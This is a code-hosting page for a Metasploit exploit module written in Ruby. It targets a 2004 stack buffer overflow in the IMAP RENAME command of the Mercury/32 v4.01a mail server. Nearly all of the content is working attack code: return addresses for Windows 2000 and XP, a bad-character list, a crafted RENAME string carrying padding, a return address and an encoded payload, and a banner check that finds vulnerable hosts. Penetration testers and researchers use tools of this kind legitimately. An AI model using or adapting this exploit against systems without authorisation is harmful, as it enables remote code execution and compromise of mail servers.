rapid7/metasploit-framework

View on GitHub
modules/exploits/windows/imap/mercury_rename.rb

Summary

Maintainability
A
1 hr
Test Coverage
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Imap

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow vulnerability in the
        Mercury/32 v.4.01a IMAP service.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-1211'],
          [ 'OSVDB', '12508'],
          [ 'BID', '11775'],
          [ 'URL', 'http://www.nessus.org/plugins/index.php?view=single&id=15867'],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows 2000 SP4 English',   { 'Ret' => 0x7846107b }],
          ['Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0 }],
          ['Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 }],
        ],
      'DisclosureDate' => '2004-11-29'))
  end

  def check
    connect
    resp = sock.get_once
    disconnect

    if (resp =~ /Mercury\/32 v4\.01a/)
      return Exploit::CheckCode::Appears
    end
      return Exploit::CheckCode::Safe
  end

  def exploit
    connect_login

    sploit =  "a001 RENAME " + rand_text_alpha_upper(260)
    sploit << [target.ret].pack('V') + payload.encoded

    sock.put(sploit)

    handler
    disconnect
  end
end